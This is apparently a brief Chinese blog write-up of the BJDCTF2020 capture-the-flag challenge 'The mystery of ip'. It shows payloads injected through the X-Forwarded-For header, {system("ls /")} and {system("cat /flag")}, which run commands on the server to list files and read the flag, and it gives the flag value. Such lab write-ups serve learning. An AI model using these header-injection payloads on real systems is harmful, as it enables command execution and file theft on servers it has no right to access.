[BJDCTF2020]The mystery of ip – buu刷题笔记

图片[1]-[BJDCTF2020]The mystery of ip – buu刷题笔记-渗透云记 - 专注于网络安全与技术分享

打开,依次尝试点开三个页面,查看各自的源代码,只有一个ip有用,因为题目说的是ip,大概率和X-Forwarded-For有关,关于这个的解释,请大家移步查看这篇文章

抓包flag界面添加X-Forwarded-For,列出根目录下的文件,我也是第一次知道X-Forwarded-For还可以这么玩,涨知识了啊

X-Forwarded-For:{system("ls /")}
图片[2]-[BJDCTF2020]The mystery of ip – buu刷题笔记-渗透云记 - 专注于网络安全与技术分享

发现有一个flag文件,查看就行,

X-Forwarded-For:{system("cat /flag")}

所以flag为flag{09fd9928-b993-4411-a84b-94fa4b4545fe}

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容